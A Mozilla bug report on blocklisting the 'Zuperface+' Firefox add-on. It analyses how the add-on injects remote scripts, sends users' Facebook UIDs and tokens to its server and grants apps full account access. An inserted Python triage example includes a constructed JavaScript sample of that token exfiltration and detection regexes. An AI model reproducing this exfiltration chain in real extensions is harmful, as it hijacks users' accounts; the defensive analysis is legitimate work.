Bug 729356 - Malicious "Zuperface+" add-on
Status: RESOLVED FIXED
[Read comment #6 before posting!]
Product: Toolkit
Classification: Components
Component: Blocklisting
Assigned To: Jorge Villalobos [:jorgev]
Reported: 2012-02-21 16:20 PST by MarkH
Modified: 2016-03-07 15:30 PST

Attachments
20120221 zuperface.zip (562.71 KB, application/octet-stream)
2012-02-21 16:20 PST, MarkH
Description MarkH 2012-02-21 16:20:55 PST
Created attachment 599404 [details]
20120221 zuperface.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11

Steps to reproduce:

Downloaded the extension from http://www.zuperface.com/firefox.html


Actual results:

addon loads adobeflashplayer.js

adobeflashplayer.js:

sets/reads state from local storage
sets up debugging options
if it's on a facebook domain, it injects http://speed.zuperface.com/zuperface.js
if it's on a google domain, it injects http://speed.zuperface.com/g.js

zuperface.js:

Grabs your basic details via http://graph.facebook.com/<uid>&callback=cins

Injects http://speed.zuperface.com/offline.js if it's turned off, otherwise injects http://speed.zuperface.com/zaza.js; both injects pass your UID to their server as GET params

Calls http://super.zuperface.com/reklam.html, which loads an image tag to http://whos.amung.us/widget/ksuw9d7f54el.png


zaja.js (several versions of this, based on the value of the 'cins' GET param):

cins=3
Injects a hidden iframe to http://speed.zuperface.com/letsgo.html? which includes your FB tokens for posting as GET params
Make a POST to http://www.facebook.com/ajax/follow/manage_subscriptions.php, to subscribe to FB user 1520948160

cins=1
Injects a hidden iframe of http://speed.zuperface.com/tokmak.php? which includes your FB open graph token, UID, sex, and an FB application ID as GET params


letsgo.html:

has the following FB app IDs: ['6802152230','176901472156','291549705119','5085647995'];

Creates an iframe for each app ID to http://173.244.196.29/~zuperfac/speed/sol.html? which includes your FB tokens for posting as GET params


sol.html:

Posts to http://www.facebook.com/connect/uiserver.php to give the passed in app ID full permissions to your Facebook account.


Password on the attached zip is 'infected'.



Expected results:

It should not steal your Facebook user information/tokens; it should not give FB applications full access to your Facebook account without your consent.
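The report above describes a chain of indicators a reviewer can look for when triaging an add-on: a local script that injects remote scripts depending on the site, hidden iframes, and request URLs that carry the user's id or tokens as GET parameters. The following is an added static-triage example, not code from the report or the add-on; the JavaScript sample is constructed to mirror the described behaviour, and the parameter names other than `uid` and `cins` (such as `access_token`) are assumed names, not values from the report.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the behaviour the report describes (not the
# add-on's real code): inject a remote script only on a Facebook domain, then
# create a hidden iframe whose query string carries the user's id and a token.
SAMPLE_JS = '''
if (location.host.indexOf("facebook.com") != -1) {
  var s = document.createElement("script");
  s.src = "http://speed.zuperface.com/zuperface.js";
  document.body.appendChild(s);
}
var f = document.createElement("iframe");
f.style.display = "none";
f.src = "http://speed.zuperface.com/letsgo.html?uid=" + uid + "&access_token=" + tok;
'''

URL_RE = re.compile(r'["\'](https?://[^"\'\s<>]+)["\']')   # URLs in string literals
PARAM_RE = re.compile(r'[?&]([A-Za-z_]\w*)=')               # query parameter names
# Parameter names that leak identity or session material when sent to a third
# party; "uid" and "cins" come from the report, the rest are assumed names.
SENSITIVE_PARAMS = {"uid", "cins", "token", "access_token"}

def extract_remote_urls(js, allowed_hosts=()):
    """Return URLs found in string literals whose host is not in allowed_hosts."""
    hits = []
    for url in URL_RE.findall(js):
        host = urlparse(url).hostname or ""
        if host not in allowed_hosts:
            hits.append(url)
    return hits

def sensitive_params(js):
    """Return sorted sensitive query parameter names built anywhere in the script."""
    return sorted({p for p in PARAM_RE.findall(js) if p in SENSITIVE_PARAMS})

def has_hidden_iframe(js):
    """True when the script creates an iframe and hides an element with display:none."""
    return 'createElement("iframe")' in js and re.search(r'display\s*=\s*"none"', js) is not None

def triage(js, allowed_hosts=()):
    """Summarise the indicators; remote loads plus sensitive params is the exfil pattern."""
    return {"remote": extract_remote_urls(js, allowed_hosts),
            "params": sensitive_params(js),
            "hidden_iframe": has_hidden_iframe(js)}

if __name__ == "__main__":
    print(triage(SAMPLE_JS))
```

Running it on the constructed sample reports both remote loads, the `uid` and `access_token` parameters, and the hidden iframe; a reviewer would then read the fetched remote scripts, since the local file alone shows only the loader.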
Comment 1 Jorge Villalobos [:jorgev] 2012-02-22 09:44:30 PST
This looks like a very elaborate Facebook customization add-on. I tested for a while and didn't see any bad behavior, like pages or apps suddenly added to my account. Even if it did that, it's insufficient for blocklisting.

Any privacy concerns should be voiced to the developers of this add-on, so they can fix them.
Comment 2 MarkH 2012-02-22 09:55:47 PST
Jorge,

You won't see any visible bad behavior easily with this one, aside from a new person your Facebook account is subscribed to.  The only other evidence you'll see in an account is four new FB apps installed.  The problem, however, is that the four FB apps it installs are given full permissions to your account.  That means they can post as you, from their own servers, whenever they want.  As a result, we see significant amounts of spam coming from the bad actor's infrastructure, using the compromised accounts.
Comment 3 Jorge Villalobos [:jorgev] 2012-02-22 10:07:53 PST
The add-on itself is not malicious in nature, compromising users' security or causing major stability problems. This doesn't qualify for blocklisting.
Comment 4 MarkH 2012-02-22 10:40:07 PST
Jorge, 

The add-on downloads malicious JS to get full access to a person's facebook account.  That means their email address, their name, their phone number, the ability to post messages as them, to remove content as them, ...

This one is more malicious than the other add-ons that were blocked in the past.
Comment 5 Jorge Villalobos [:jorgev] 2012-02-22 13:55:10 PST
I disagree. The other add-ons you have posted have the intent to deceive users and take advantage from them. They use shady temporary domains, change their code ever so slightly and distribute over and over. 

This add-on looks like it has been worked on significantly, and it is actually meant to benefit users. It has the potential to access user information, but so can any add-on. Unless it is actively stealing info and you have evidence of this, I'll err on the side of caution and not blocklist an add-on that looks legitimate.
Comment 6 Jorge Villalobos [:jorgev] 2012-02-22 16:38:44 PST
We have been given additional information about Zuperface+. It is adding apps to the Facebook accounts of its users, with full access permissions, without their consent. These apps generate spam posts. They are being disabled by Facebook, but the add-on gets new app ids dynamically, indicating malicious intent.

To users of Zuperface+: while this add-on can be useful, it is using your accounts for spamming purposes. We can't allow this, so we have decided to block Zuperface+, at least until they correct their behavior.
Comment 7 Jorge Villalobos [:jorgev] 2012-02-22 16:42:04 PST
Softblock put in place: https://addons.mozilla.org/en-US/firefox/blocked/i69
